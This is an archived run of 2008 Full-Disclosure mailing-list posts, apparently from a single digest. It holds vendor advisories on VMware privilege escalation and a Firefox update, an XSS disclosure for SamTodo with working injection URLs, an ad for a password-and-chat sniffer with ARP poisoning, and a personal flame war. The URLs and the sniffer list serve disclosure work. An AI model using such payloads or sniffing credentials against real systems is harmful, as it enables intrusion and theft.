Disclosure Timeline: 2007-05-22 - Vulnerability reported to vendor 2008-06-04 - Coordinated public release of advisory --- [...SNIP...] --- titon. From smok3f00 at gmail.com Thu Jun 5 08:59:44 2008 From: smok3f00 at gmail.com (SmOk3) Date: Thu, 5 Jun 2008 08:59:44 +0100 Subject: [Full-disclosure] XSS in SamTodo v1.1 Message-ID: <1f9bad3a0806050059x6c7650cfkbbafc9d01d574e8@mail.gmail.com> Original advisory: http://www.davidsopas.com/soapbox/samtodo.txt XSS in SamTodo v1.1 http://samjlevy.com/samtodo by David Sopas Ferreira Found and reported at : 22-05-2008PT Full disclosure at : 05-06-2008PT ?!--------------------------------------------------------- Flaws -----!? XSS attacks on this script (vulnerable files - dsp_main.php and dsp_task_editor.php): index.php?go=main.taskeditor&tid=f29de7fa-6625-4e20-8a19-11c0f4d799f6%22%3E%3Ch1%3Eboo%3C/h1%3E&mode=edit index.php?go=main.default&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E index.php?go=main.default&orderBy=taskComplete&ascDesc=DESC&completed=1%22%3E%3Ch1%3Ef00bar%3C/h1%3E ?!--------------------------------------------------------- Solution --------!? Vendor, Samuel Levy, was very fast with reply, and showed a lot of concern on security matters on his script. Version 1.2 will be out soon and will fix all this flaws. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080605/e7c58cd9/attachment.html From groffg at gmgdesign.com Thu Jun 5 13:29:42 2008 From: groffg at gmgdesign.com (Garrett M. Groff) Date: Thu, 5 Jun 2008 08:29:42 -0400 Subject: [Full-disclosure] [offtopic] Fwd: Comments on: PhoenixMarsLander site hacked References: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com><282010.38051.qm@web38903.mail.mud.yahoo.com><9a4ce7b20806041146x82fc4ebi2a12fa2ddb7ac678@mail.gmail.com><4b6ee9310806041229s576ef31djcfec69bb742beaf1@mail.gmail.com> <029301c8c6b5$c6d35ce0$8400a8c0@UNIT4> Message-ID: <000e01c8c707$d5313710$686b880a@softpro.corp> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 That's why there are email filters. Pls start using them if you value your sanity. The kind of "publicity" he/they're getting only encourages the naughty behavior. - ----- Original Message ----- From: "Patrick Nolan" To: Sent: Wednesday, June 04, 2008 10:42 PM Subject: Re: [Full-disclosure] [offtopic] Fwd: Comments on: PhoenixMarsLander site hacked >> -----Original Message----- >> From: full-disclosure-bounces at lists.grok.org.uk >> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v >> Sent: Wednesday, June 04, 2008 12:29 PM >> >> I'm not a troll, i'm a serious security researcher. >> > > A few articles or counter-articles > http://www.theregister.co.uk/2006/10/23/linguist_fingers_security_troll/p > age 2.html > > http://blogs.ittoolbox.com/security/dmorrill/archives/security-trolls-n3t > d3v -12460 > >> I was misrepresented in the media by SecurityFocus Robert >> Lemos who ruined my image. >> >> The findings have been post, >> >> http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smea >> r-campaign-against-n3td3v.html >> >> All the best, >> n3td3v > > > Other links of non-interest... > > http://ph33r.org/updates/2006/10/20/n3td3v-true-identity-finally-discover > ed. html > > http://sunbeltblog.blogspot.com/2006/10/hunt-for-n3td3v.html > > http://www.hackerfactor.com/papers/who_is_n3td3v.pdf > > > .=Pn. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.6.2 (Build 2014) - not licensed for commercial use: www.pgp.com wj8DBQFIR9wcSGIRT5oVahwRAteOAJ0fqQPsNO4s5YQKE/svcVZ0jwoLcQCg3Ire ojNE/DKSidd08WmcIovQk0s= =ZkaS -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Thu Jun 5 14:42:12 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 05 Jun 2008 09:42:12 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.04.08: VMware Tools HGFS Local Privilege Escalation Vulnerability Message-ID: <4847ED34.9030003@idefense.com> iDefense Security Advisory 06.04.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 04, 2008 I. BACKGROUND VMware is a software virtualization system which allows multiple virtual computers to run on a single system. VMware Tools provides drivers and utilities to enhance and optimize the experience within a guest operating system running under VMware. For more information visit the vendor's site at the following URL. http://www.vmware.com/ II. DESCRIPTION Local exploitation of a input validation vulnerability within VMware's Hgfs.sys driver could allow an unprivileged attacker to execute arbitrary code within the kernel of a Windows guest operating system. When a VMware guest operating system has the VMware Tools package installed, the hgfs.sys driver is loaded on the machine. This driver allows any user to open the device "\\.\hgfs" and issue IOCTLs with a buffering mode of METHOD_NEITHER. This allows untrusted user mode code to pass kernel addresses as arguments to the driver. With specially constructed input, a malicious user can use functionality within the driver to patch kernel addresses and execute arbitrary code in kernel mode. III. ANALYSIS Exploitation of this vulnerability allows an unprivileged local user to patch and execute arbitrary code within the kernel of a Windows guest operating system. In order to exploit the vulnerability, an attacker needs to be able to login to the target VMware guest virtual machine and execute a specially crafted executable. IV. DETECTION iDefense confirmed the existence of this vulnerability in hgfs.sys as included with VMware Workstation 5.5.4. Other versions are suspected vulnerable as well. V. WORKAROUND Removing VMware Tools from affected guest systems will prevent exploitation of this issue. However, doing so will also reduce performance and affect the usability of that virtual machine. VI. VENDOR RESPONSE VMware has addressed this vulnerability by releasing new versions of their affected products. In order to address affected guest operating systems, VMware Tools must be upgraded within the guest. For more information, consult VMware's advisory at the following URL. http://www.vmware.com/security/advisories/VMSA-2008-0009.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-5671 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/19/2007 Initial vendor notification 09/19/2007 Initial vendor response 06/04/2008 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Stephen Fewer of Harmony Security. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Thu Jun 5 14:45:52 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 05 Jun 2008 09:45:52 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.04.08: VMware Multiple Products vmware-authd Untrusted Library Loading Vulnerability Message-ID: <4847EE10.7010201@idefense.com> iDefense Security Advisory 06.04.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 04, 2008 I. BACKGROUND VMware Inc. markets several virtualization products which allow multiple virtual computers to run on a single system. For more information visit the following URL. http://www.vmware.com/ II. DESCRIPTION Local exploitation of an untrusted library path vulnerability in multiple products distributed by VMware Inc. could allow an attacker to execute arbitrary code with root privileges. The Linux version of VMware products include a program called 'vmware-authd', which is installed set-uid root. When this program is executed, it reads configuration options from the executing user's VMware configuration file. One such option allows the user to specify the directory in which to look for shared library modules needed by the program. By loading a specially crafted library, an attacker can execute arbitrary code with elevated privileges. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with root privileges. In order to exploit this vulnerability, an attacker must have access to execute the set-uid vmware-authd binary on an affected system. No additional credentials are needed. IV. DETECTION iDefense confirmed the existence of this vulnerability in the following VMware products. VMware Workstation 6.0.2.59824 for Linux VMware GSX Server 3.2.1.14497 for Linux VMware ESX Server 3.0.1.32039 All versions of all products which include a set-uid vmware-authd binary are suspected to be vulnerable. V. WORKAROUND To prevent exploitation of this vulnerability, modify the file permissions for the vmware-authd set-uid binary. Possible choices include removing the set-uid bit, or only allowing members of a trusted group to execute the binary. VI. VENDOR RESPONSE VMware has addressed this vulnerability by release new versions of their products. For more information, consult their advisory at the following URL. http://www.vmware.com/security/advisories/VMSA-2008-0009.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-0967 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 01/30/2008 Initial vendor notification 01/30/2008 Initial vendor response 06/04/2008 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Thu Jun 5 14:56:30 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 05 Jun 2008 09:56:30 -0400 Subject: [Full-disclosure] iDefense Security Advisory 06.04.08: VMware Tools HGFS Local Privilege Escalation Vulnerability In-Reply-To: <4847ED34.9030003@idefense.com> References: <4847ED34.9030003@idefense.com> Message-ID: <4847F08E.40301@idefense.com> iDefense Labs wrote: > VII. CVE INFORMATION > > The Common Vulnerabilities and Exposures (CVE) project has assigned the > name CVE-2008-5671 to this issue. This is a candidate for inclusion in > the CVE list (http://cve.mitre.org/), which standardizes names for > security problems. This should be CVE-2007-5761. iDefense Labs From xploitable at gmail.com Thu Jun 5 15:12:46 2008 From: xploitable at gmail.com (n3td3v) Date: Thu, 5 Jun 2008 15:12:46 +0100 Subject: [Full-disclosure] To clear the air and conspiracy about n3td3v Message-ID: <4b6ee9310806050712m3f52d375he479eecb8ef277a0@mail.gmail.com> On Thu, Jun 5, 2008 at 1:29 PM, Garrett M. Groff wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > That's why there are email filters. Pls start using them if you value your > sanity. The kind of "publicity" he/they're getting only encourages the > naughty behavior. I don't understand what you mean by they? Are you talking about my google group? The people who post on my google group are people like you, I don't understand. And what is naughty behaviour? Giving my opinion on security topics and criticizing people I don't agree with? I'm a white hat, I don't agree with naughty behaviour and to date I haven't seen any naughty behaviour apart from people who try and paint me in bad light. The google group is the same concept as funsec and I am the same concept as Gadi Evron... my google group was around long before funsec was around, so I didn't copy him. I'm not a hacker, I read news articles and give my opinion on them, thats all I do, there is no hacker group, I am not a hacker, there is nothing going on behind the scenes, because there is no behind the scenes. The google group is a bunch of security professionals like you, who like the stories I post to the group and enjoy reading my opinions. Stop believing the bad press what you read by a bunch of idiots who don't know me, Neal Krawetz, Robert Lemos, Alex Eckelberry etc who tried to say I was a hacker, who has zero-day etc. They were just horrible people who don't really know me who have helped to ruin my life, my mental health hasn't been the same since I read accusations about me that I was a hacker and I'm doing something wrong. SecurityFocus, they never even emailed me for my side of the story, I went away to university and then realised an article and PDF file had been written about me, I couldn't cope with the pressure, so I had to drop out of university because of what was post about me, because I couldn't cope with the strain. Here I am now, picking up the peices and unemployed with no university degree, until I can reapply when i'm feeling better after the stress. I will not stop posting my opinion on security topics, if I did that will mean they have won by telling their readers I was a hacker with zero-day. All the best, n3td3v From ureleet at gmail.com Thu Jun 5 15:24:16 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 5 Jun 2008 10:24:16 -0400 Subject: [Full-disclosure] To clear the air and conspiracy about n3td3v In-Reply-To: <4b6ee9310806050712m3f52d375he479eecb8ef277a0@mail.gmail.com> References: <4b6ee9310806050712m3f52d375he479eecb8ef277a0@mail.gmail.com> Message-ID: <6158bb410806050724m7736c893i340274c5f39c619@mail.gmail.com> best email youve ever written. clearly you dont know much. but thank you for admitting it. next time, when you say that you are part of mi6, we will know not to believe you. everyone print out this email and tack it in your cube, read it everyday so that we all know that he's just a pundit and actually has no skill. On Thu, Jun 5, 2008 at 10:12 AM, n3td3v wrote: > On Thu, Jun 5, 2008 at 1:29 PM, Garrett M. Groff wrote: >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> That's why there are email filters. Pls start using them if you value your >> sanity. The kind of "publicity" he/they're getting only encourages the >> naughty behavior. > > I don't understand what you mean by they? Are you talking about my google group? > The people who post on my google group are people like you, I don't understand. > > And what is naughty behaviour? Giving my opinion on security topics > and criticizing people I don't agree with? > > I'm a white hat, I don't agree with naughty behaviour and to date I > haven't seen any naughty behaviour apart from people who try and paint > me in bad light. > > The google group is the same concept as funsec and I am the same > concept as Gadi Evron... my google group was around long before funsec > was around, so I didn't copy him. > > I'm not a hacker, I read news articles and give my opinion on them, > thats all I do, there is no hacker group, I am not a hacker, there is > nothing going on behind the scenes, because there is no behind the > scenes. > > The google group is a bunch of security professionals like you, who > like the stories I post to the group and enjoy reading my opinions. > > Stop believing the bad press what you read by a bunch of idiots who > don't know me, Neal Krawetz, Robert Lemos, Alex Eckelberry etc who > tried to say I was a hacker, who has zero-day etc. > > They were just horrible people who don't really know me who have > helped to ruin my life, my mental health hasn't been the same since I > read accusations about me that I was a hacker and I'm doing something > wrong. > > SecurityFocus, they never even emailed me for my side of the story, I > went away to university and then realised an article and PDF file had > been written about me, I couldn't cope with the pressure, so I had to > drop out of university because of what was post about me, because I > couldn't cope with the strain. > > Here I am now, picking up the peices and unemployed with no university > degree, until I can reapply when i'm feeling better after the stress. > > I will not stop posting my opinion on security topics, if I did that > will mean they have won by telling their readers I was a hacker with > zero-day. > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Thu Jun 5 15:24:56 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 5 Jun 2008 10:24:56 -0400 Subject: [Full-disclosure] [offtopic] Fwd: Comments on: PhoenixMarsLander site hacked In-Reply-To: <000e01c8c707$d5313710$686b880a@softpro.corp> References: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com> <282010.38051.qm@web38903.mail.mud.yahoo.com> <9a4ce7b20806041146x82fc4ebi2a12fa2ddb7ac678@mail.gmail.com> <4b6ee9310806041229s576ef31djcfec69bb742beaf1@mail.gmail.com> <029301c8c6b5$c6d35ce0$8400a8c0@UNIT4> <000e01c8c707$d5313710$686b880a@softpro.corp> Message-ID: <6158bb410806050724t25372c2fn694783e8ac01c20c@mail.gmail.com> from, to, or subject containing n3td3v. go to trash. On Thu, Jun 5, 2008 at 8:29 AM, Garrett M. Groff wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > That's why there are email filters. Pls start using them if you value your > sanity. The kind of "publicity" he/they're getting only encourages the > naughty behavior. > > > > > - ----- Original Message ----- > From: "Patrick Nolan" > To: > Sent: Wednesday, June 04, 2008 10:42 PM > Subject: Re: [Full-disclosure] [offtopic] Fwd: Comments on: > PhoenixMarsLander site hacked > > >>> -----Original Message----- >>> From: full-disclosure-bounces at lists.grok.org.uk >>> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v >>> Sent: Wednesday, June 04, 2008 12:29 PM >>> >>> I'm not a troll, i'm a serious security researcher. >>> >> >> A few articles or counter-articles >> http://www.theregister.co.uk/2006/10/23/linguist_fingers_security_troll/p >> age 2.html >> >> http://blogs.ittoolbox.com/security/dmorrill/archives/security-trolls-n3t >> d3v -12460 >> >>> I was misrepresented in the media by SecurityFocus Robert >>> Lemos who ruined my image. >>> >>> The findings have been post, >>> >>> http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smea >>> r-campaign-against-n3td3v.html >>> >>> All the best, >>> n3td3v >> >> >> Other links of non-interest... >> >> http://ph33r.org/updates/2006/10/20/n3td3v-true-identity-finally-discover >> ed. html >> >> http://sunbeltblog.blogspot.com/2006/10/hunt-for-n3td3v.html >> >> http://www.hackerfactor.com/papers/who_is_n3td3v.pdf >> >> >> .=Pn. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > -----BEGIN PGP SIGNATURE----- > Version: PGP Desktop 9.6.2 (Build 2014) - not licensed for commercial use: > www.pgp.com > > wj8DBQFIR9wcSGIRT5oVahwRAteOAJ0fqQPsNO4s5YQKE/svcVZ0jwoLcQCg3Ire > ojNE/DKSidd08WmcIovQk0s= > =ZkaS > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From xploitable at gmail.com Thu Jun 5 16:06:46 2008 From: xploitable at gmail.com (n3td3v) Date: Thu, 5 Jun 2008 16:06:46 +0100 Subject: [Full-disclosure] To clear the air and conspiracy about n3td3v In-Reply-To: <6158bb410806050724m7736c893i340274c5f39c619@mail.gmail.com> References: <4b6ee9310806050712m3f52d375he479eecb8ef277a0@mail.gmail.com> <6158bb410806050724m7736c893i340274c5f39c619@mail.gmail.com> Message-ID: <4b6ee9310806050806k1573a471r4f920d19192170aa@mail.gmail.com> On Thu, Jun 5, 2008 at 3:24 PM, Ureleet wrote: > best email youve ever written. clearly you dont know much. but thank > you for admitting it. next time, when you say that you are part of > mi6, we will know not to believe you. everyone print out this email > and tack it in your cube, read it everyday so that we all know that > he's just a pundit and actually has no skill. Why did you ruin the build up to Web Application Security Awareness Day? It was because of what you and Valdis said on the weeks running upto it that nobody post anything. I mentioned mi6 to try and scare you and stop you annoying me. Your excuse for harassing me on the weeks running upto it was don't post anything on May 1 so n3td3v can't make a name for himself, but the day wasn't about me making a name it was about people disclosing throw away vulnerabilities like cross-site scripting that people are usually too shy to post on a normal day, because those bugs seem too insignificant and too lame to post and don't usually give them enough hacker points on a normal day. With Web Application Security Awareness Day it was ment to bring credibility back to web application security bugs like XSS, but you didn't see it that way, you thought it was about me making a name for myself, even though I already had a name for myself already because of the bad press and conspiracy links between me and Gobbles, whoever the heck he is. So everyone knows who n3td3v is, but the mystery remains, who is Gobbles??? He is the real hacker you should be tracking, you've wasted all your time and resources on trashing me for no reason just because you thought I was some elite hacker called Gobbles? I'm still trying to work out in my head what all the attention is on me for and why people thought I was someone called Gobbles and that I was three people??? If that isn't enough to fuck my head up I don't know what is, a forensic study on me, just because some idiot (Neal Krawetz) thought I was Gobbles??? I don't know who Gobbles is, I have never spoke to Gobbles, I have nothing to do with him and don't want to know him. He seems to be some elite hacker, which someone thought was me, but I have no idea about him and don't know who he is. All the best, n3td3v > > On Thu, Jun 5, 2008 at 10:12 AM, n3td3v wrote: >> On Thu, Jun 5, 2008 at 1:29 PM, Garrett M. Groff wrote: >>> -----BEGIN PGP SIGNED MESSAGE----- >>> Hash: SHA1 >>> >>> That's why there are email filters. Pls start using them if you value your >>> sanity. The kind of "publicity" he/they're getting only encourages the >>> naughty behavior. >> >> I don't understand what you mean by they? Are you talking about my google group? >> The people who post on my google group are people like you, I don't understand. >> >> And what is naughty behaviour? Giving my opinion on security topics >> and criticizing people I don't agree with? >> >> I'm a white hat, I don't agree with naughty behaviour and to date I >> haven't seen any naughty behaviour apart from people who try and paint >> me in bad light. >> >> The google group is the same concept as funsec and I am the same >> concept as Gadi Evron... my google group was around long before funsec >> was around, so I didn't copy him. >> >> I'm not a hacker, I read news articles and give my opinion on them, >> thats all I do, there is no hacker group, I am not a hacker, there is >> nothing going on behind the scenes, because there is no behind the >> scenes. >> >> The google group is a bunch of security professionals like you, who >> like the stories I post to the group and enjoy reading my opinions. >> >> Stop believing the bad press what you read by a bunch of idiots who >> don't know me, Neal Krawetz, Robert Lemos, Alex Eckelberry etc who >> tried to say I was a hacker, who has zero-day etc. >> >> They were just horrible people who don't really know me who have >> helped to ruin my life, my mental health hasn't been the same since I >> read accusations about me that I was a hacker and I'm doing something >> wrong. >> >> SecurityFocus, they never even emailed me for my side of the story, I >> went away to university and then realised an article and PDF file had >> been written about me, I couldn't cope with the pressure, so I had to >> drop out of university because of what was post about me, because I >> couldn't cope with the strain. >> >> Here I am now, picking up the peices and unemployed with no university >> degree, until I can reapply when i'm feeling better after the stress. >> >> I will not stop posting my opinion on security topics, if I did that >> will mean they have won by telling their readers I was a hacker with >> zero-day. >> >> All the best, >> >> n3td3v >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > From reepex at gmail.com Thu Jun 5 16:07:22 2008 From: reepex at gmail.com (reepex) Date: Thu, 5 Jun 2008 10:07:22 -0500 Subject: [Full-disclosure] next generation sniffer In-Reply-To: References: Message-ID: so you combined wireshark and ettercap. nice job. On Wed, Jun 4, 2008 at 11:22 PM, inter inter wrote: > [0x4553-Intercepter] offers the following features: > > + Sniffing passwords\hashes of the types: > > ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP\WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE > + Sniffing chat messages of ICQ\AIM\JABBER\YAHOO\MSN\GADU-GADU\IRC\MRA > + Promiscuous-mode scanning + ARP scanning + DHCP discovering > + Changing MAC address of LAN adapters > + Raw mode (with filtering rules) > + eXtreme mode > + Capturing packets and post-capture (offline) analyzing > + Remote traffic capturing via RPCAP daemon > + Built-in arp poison module > + Reconstruction of SMTP\POP3 messages > > Works on Windows NT(2K\XP\2k3\Vista). > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080605/6f1d999e/attachment.html From tbiehn at gmail.com Thu Jun 5 21:14:58 2008 From: tbiehn at gmail.com (T Biehn) Date: Thu, 5 Jun 2008 16:14:58 -0400 Subject: [Full-disclosure] Metasploit - Hack ? In-Reply-To: <4b6ee9310806040931v454c83dcpc64056f22a72c814@mail.gmail.com> References: <200806021257.31737.fdlist@digitaloffense.net> <4b6ee9310806040931v454c83dcpc64056f22a72c814@mail.gmail.com> Message-ID: <2d6724810806051314v7c8caf8cmef63c6975de8bdb4@mail.gmail.com> Did you just totally match up two instances of the string "ARP Poisoning"? You've got a lot more skills than the industry gives you credit for. I for one would be glad to replace my Guhnue software with one n3td3v expert analysiser. On Wed, Jun 4, 2008 at 12:31 PM, n3td3v wrote: > On Mon, Jun 2, 2008 at 6:57 PM, H D Moore wrote: >> Looks like someone is doing ARP poisoning at the ISP level. The actual >> metasploit.com server(s) are untouched, but someone is still managing to >> MITM a large portion of the incoming traffic. To make things even more >> fun, its cooinciding with a DoS attack (syn floods) on most of the open >> services. >> >> If you are worried about the the Metasploit Framework source code being >> MITM'd during SVN checkouts, use the SSL version of the SVN tree: >> >> $ svn co https://metasploit.com/svn/framework3/trunk/ >> >> -HD >> >> >> On Monday 02 June 2008, Jacques Erasmus wrote: >>> Seems like the metasploit site has been hacked. >> >> > > I found this post [1] on my news group it sounds like an awful > coincidence though. > > [1] http://groups.google.com/group/n3td3v/browse_thread/thread/41b832968eacf1d9 > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From lists at grospolina.org Thu Jun 5 21:39:47 2008 From: lists at grospolina.org (kat) Date: Thu, 5 Jun 2008 22:39:47 +0200 Subject: [Full-disclosure] Fwd: Comments on: Phoenix Mars Lander site hacked In-Reply-To: <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com> References: <4b6ee9310806021235i1a314511vf110bbd582f526ee@mail.gmail.com> <4b6ee9310806021312y58044239ifee07431c7597910@mail.gmail.com> <119405.1212440467@turing-police.cc.vt.edu> <4b6ee9310806021417yd071d9dhf9cdaa5fc567991a@mail.gmail.com> <376417779.20080603012652@smtp.xlhost.de> <4b6ee9310806040942g59ffa15t8ad84fff62c66214@mail.gmail.com> Message-ID: <1937385639.20080605223947@smtp.xlhost.de> oh, I was talking about Brazil - The Movie (you are living in) ;) org msg: On Tue, Jun 3, 2008 at 12:26 AM, kat wrote: > Brazil! > No, infact not, but Zone-H rats have been able to shed light on the origin of the attackers. http://www.zone-h.org/content/view/14948/1/ I can't believe I just gave this site hits, but it helps solve the mystery!!! The day Zone-H closes shop, the day I party like a mother fo! All the best, n3td3v From security at mandriva.com Fri Jun 6 06:38:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 05 Jun 2008 23:38:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:110 ] - Updated Firefox packages fix vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:110 http://www.mandriva.com/security/ _______________________________________________________________________ Package : mozilla-firefox Date : June 5, 2008 Affected: 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 2.0.0.14. This update provides the latest Firefox to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1380 http://www.mozilla.org/security/announce/2008/mfsa2008-20.html _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: a61188854d7fafcd7964437c2926b93e 2008.0/i586/devhelp-0.16-1.5mdv2008.0.i586.rpm ceb44e80f38f535e3c2eb56d6422016a 2008.0/i586/devhelp-plugins-0.16-1.5mdv2008.0.i586.rpm 885fddad8edde5b000858cef769da373 2008.0/i586/eclipse-cvs-client-3.3.0-0.20.8.5mdv2008.0.i586.rpm 1fe33c71da66edda635ccbc8a6917c6c 2008.0/i586/eclipse-ecj-3.3.0-0.20.8.5mdv2008.0.i586.rpm c4187c28cedc405eb81b2ac3e548f721 2008.0/i586/eclipse-jdt-3.3.0-0.20.8.5mdv2008.0.i586.rpm f4a5f5456948372fbd6ef1a5c28825a9 2008.0/i586/eclipse-pde-3.3.0-0.20.8.5mdv2008.0.i586.rpm efdd7b60db3feb6e3b62ab4ff9a9be41 2008.0/i586/eclipse-pde-runtime-3.3.0-0.20.8.5mdv2008.0.i586.rpm 02ddc78d3e5bd037c967b230f0351060 2008.0/i586/eclipse-platform-3.3.0-0.20.8.5mdv2008.0.i586.rpm 35959ff3bb0b8c79aca38e4b49d3805c 2008.0/i586/eclipse-rcp-3.3.0-0.20.8.5mdv2008.0.i586.rpm 3093864895033753b362843059980931 2008.0/i586/epiphany-2.20.0-1.5mdv2008.0.i586.rpm e624f47d08f948696093f6b6bd927d3e 2008.0/i586/epiphany-devel-2.20.0-1.5mdv2008.0.i586.rpm 038df2e534480f47758d109700535f93 2008.0/i586/galeon-2.0.3-7.5mdv2008.0.i586.rpm 2a628352eb0d72171097fd85c971a4fa 2008.0/i586/gnome-python-extras-2.19.1-4.5mdv2008.0.i586.rpm a1c7e7e9ec7af51d39caec204e386b4e 2008.0/i586/gnome-python-gda-2.19.1-4.5mdv2008.0.i586.rpm e1783add108ba72052540c6244d56eb4 2008.0/i586/gnome-python-gda-devel-2.19.1-4.5mdv2008.0.i586.rpm 6b2ef0903a3a3eb8bf9f28cb70e7fb4c 2008.0/i586/gnome-python-gdl-2.19.1-4.5mdv2008.0.i586.rpm 372243a85c2bc59ef0170b10b4bce561 2008.0/i586/gnome-python-gksu-2.19.1-4.5mdv2008.0.i586.rpm 01e55fabe3b875251efb8f794dcdf734 2008.0/i586/gnome-python-gtkhtml2-2.19.1-4.5mdv2008.0.i586.rpm c74653fcc106c86d9b042f8a1b22f305 2008.0/i586/gnome-python-gtkmozembed-2.19.1-4.5mdv2008.0.i586.rpm d4fa55b42b58abf402d6d912c9dcae0c 2008.0/i586/gnome-python-gtkspell-2.19.1-4.5mdv2008.0.i586.rpm 841c74414cbbd908394a464b0daaa85a 2008.0/i586/libdevhelp-1_0-0.16-1.5mdv2008.0.i586.rpm 6f7e824cba82c7491bf920101f18c951 2008.0/i586/libdevhelp-1-devel-0.16-1.5mdv2008.0.i586.rpm 63636b50d04ae4bae6fe3044d3f85a22 2008.0/i586/libmozilla-firefox2.0.0.14-2.0.0.14-3.1mdv2008.0.i586.rpm db55c36993e7ab85f15ced0a051bbf14 2008.0/i586/libmozilla-firefox-devel-2.0.0.14-3.1mdv2008.0.i586.rpm 20c35ddd9388790ced31a11349931003 2008.0/i586/libswt3-gtk2-3.3.0-0.20.8.5mdv2008.0.i586.rpm f33dd97ca138daadddd5148b92470ebf 2008.0/i586/libtotem-plparser7-2.20.1-1.4mdv2008.0.i586.rpm e9aa86884514f5e3becfafb340bc1159 2008.0/i586/libtotem-plparser-devel-2.20.1-1.4mdv2008.0.i586.rpm 645f38b325bea85ef1d51a30eb9c5280 2008.0/i586/mozilla-firefox-2.0.0.14-3.1mdv2008.0.i586.rpm 0a216c43ba98052bf76d5d5615299c4b 2008.0/i586/mozilla-firefox-af-2.0.0.14-1mdv2008.0.i586.rpm 677c2107f62303a362e86a8d5606a27b 